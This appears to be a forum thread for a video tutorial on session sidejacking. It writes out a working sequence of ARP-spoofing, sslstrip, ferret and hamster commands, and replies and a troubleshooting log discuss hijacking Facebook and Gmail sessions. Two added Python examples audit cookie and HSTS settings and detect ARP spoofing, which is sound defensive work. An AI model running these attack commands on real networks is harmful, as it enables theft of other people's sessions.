[Video] Session Sidejacking (Ferret and Hamster)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?3pz9w85jd4s328q
What is this?
This video demos how to do "Session Sidejacking". Sidejacking is where you clone your target's cookies, therefore you're "sharing" their identity for that account (without ever knowing the username or password)!
What do I need?
> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*
Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z
Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
Notes:
Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42
Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
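Seen from the server side, the technique in the post above depends on a session cookie crossing the network in clear text, which is what the cookie `Secure` attribute and HSTS exist to prevent. The following check is an added example, not part of the original post or of any tool it names; the header samples, the cookie name `sid` and the finding labels are constructed for illustration.

```python
from http.cookies import SimpleCookie

# Constructed sample responses (header name, value); not captured traffic.
WEAK = [
    ("Set-Cookie", "sid=abc123; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/"),
]
HARDENED = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "sid=abc123; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "theme=dark; Path=/"),
]


def hsts_max_age(headers):
    """Return the HSTS max-age in seconds, or 0 if absent, invalid or disabled."""
    for name, value in headers:
        if name.lower() != "strict-transport-security":
            continue
        for directive in value.split(";"):
            key, _, val = directive.strip().partition("=")
            val = val.strip().strip('"')
            if key.strip().lower() == "max-age" and val.isdigit():
                return int(val)
        return 0  # only the first HSTS header is honoured
    return 0


def audit_response(headers, session_cookies):
    """List the findings that leave a session open to capture over plain HTTP."""
    findings = []
    if hsts_max_age(headers) == 0:
        findings.append("no-hsts")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for cookie, morsel in jar.items():
            # Without Secure the browser also sends the cookie over http://
            if cookie in session_cookies and not morsel["secure"]:
                findings.append(f"{cookie}:missing-secure")
    return sorted(findings)


if __name__ == "__main__":
    for label, resp in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_response(resp, {"sid"}))
```

A `max-age=0` policy counts as no HSTS here, because that value tells the browser to forget the host's policy.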
Re: [Video] Session Sidejacking (Ferret and Hamster)
Great video, thank you for posting this. I am very interested in trying this out myself.
Well done!
Re: [Video] Session Sidejacking (Ferret and Hamster)
Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
Re: [Video] Session Sidejacking (Ferret and Hamster)
What software do you use for creating the videos?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Thanks for sharing, great video, keep going.
Re: [Video] Session Sidejacking (Ferret and Hamster)
I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.
Any ideas? Is gmail not allowing unencrypted logins now?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Quote:
Originally Posted by freemymind
Great video, thank you for posting this. I am very interested in trying this out myself.
Well done!
Quote:
Originally Posted by Thunder-R
Thanks for sharing, great video, keep going.
Thanks for the thanks
Quote:
Originally Posted by A Student
Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
Yep. Works for me. Try again?
Quote:
Originally Posted by CyberGod
What software do you use for creating the videos?
Camtasia Studio
Quote:
Originally Posted by Bandito
I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.
Any ideas? Is gmail not allowing unencrypted logins now?
Try SSLStrip.
Re: [Video] Session Sidejacking (Ferret and Hamster)
g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Quote:
Originally Posted by kenv202
g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?
Nope.
Could you change your setup, so it could do a test over eth0 and see if it works that way?
Using a Live CD of BackTrack? Installed? Updated BackTrack at all?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Quote:
Originally Posted by g0tmi1k
Nope.
Could you change your setup, so it could do a test over eth0 and see if it works that way?
Using a Live CD of BackTrack? Installed? Updated BackTrack at all?
hi sorry for the late reply, i am using persistent live cd BT4 final, i have updated everything recently using the apt-get cmd
i fixed the LLC error by changing to my alfa card rather than using my internal wireless card..
here is my log:
1st window:
echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
2nd window:
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~# sslstrip -p -k -f
sslstrip 0.6 by Moxie Marlinspike running...
3rd window: (this is where it starts going wrong i think)
-- Sniffing on interface "wlan1"
SNIFFING: wlan1
LINKTYPE: 1 Ethernet
ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
Traffic seen
ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"
4th window :
root@bt:~# /pentest/sniffers/hamster/hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy BackTrack Linux
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
GET /StreamReceiver/services
GET /StreamReceiver/services HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: rcv-srv22.inplay.tubemogul.com
Connection: close
Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8
recv failed: Connection reset by peer
recv failed: Connection reset by peer
i have no idea why it says recv failed: Connection reset by peer...
basically once i got hamster up n running, i proceeded to use my 2nd laptop, which uses windows 7, and used firefox to log into my gmail account.. then refreshed Konqueror on my BT4 machine but didn't see the log for that computer in Konqueror..
(yes both of my computer r connected to the same network)
hope u can help =)
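On the monitoring side, repeated unsolicited ARP replies like those in the first window of the log above are what a network sensor keys on. The sketch below is an added example, not part of the thread or of any tool named in it; the function names, alert labels and sample observations are constructed. It also normalises MAC notation, since the arpspoof output above prints octets unpadded (0:c0:ca:...) while ferret pads them (00:c0:ca:...).

```python
def normalize_mac(mac):
    """Zero-pad each octet so 0:c0:ca:... and 00:c0:ca:... compare equal."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def find_arp_anomalies(observations, baseline):
    """Scan (ip, mac) pairs taken from ARP replies, in arrival order.

    baseline maps an IP to its known-good MAC (e.g. the gateway's).
    Returns de-duplicated (kind, ip, mac) alerts in the order first raised.
    """
    baseline = {ip: normalize_mac(mac) for ip, mac in baseline.items()}
    last_mac = {}   # ip -> MAC most recently seen claiming it
    claims = {}     # mac -> set of IPs it has claimed
    alerts = []

    def raise_alert(kind, ip, mac):
        if (kind, ip, mac) not in alerts:
            alerts.append((kind, ip, mac))

    for ip, raw_mac in observations:
        mac = normalize_mac(raw_mac)
        if ip in baseline and baseline[ip] != mac:
            raise_alert("baseline-mismatch", ip, mac)
        if ip in last_mac and last_mac[ip] != mac:
            raise_alert("ip-moved", ip, mac)
        last_mac[ip] = mac
        claims.setdefault(mac, set()).add(ip)
        if len(claims[mac]) > 1:
            raise_alert("mac-claims-many-ips", ip, mac)
    return alerts


# Constructed observations; the MACs use the locally administered 02: prefix.
BASELINE = {"192.168.1.1": "02:00:00:00:00:01"}
OBSERVED = [
    ("192.168.1.1", "02:00:00:00:00:01"),   # gateway answers for itself
    ("192.168.1.50", "2:0:0:0:0:50"),       # a host, unpadded notation
    ("192.168.1.1", "2:0:0:0:0:50"),        # same host now claims the gateway IP
    ("192.168.1.1", "02:00:00:00:00:50"),   # repeat in padded notation
]

if __name__ == "__main__":
    for alert in find_arp_anomalies(OBSERVED, BASELINE):
        print(alert)
```

DHCP reassignment and multi-homed routers can raise the last two alert kinds legitimately, so the baseline mismatch on the gateway address is the strongest signal of the three.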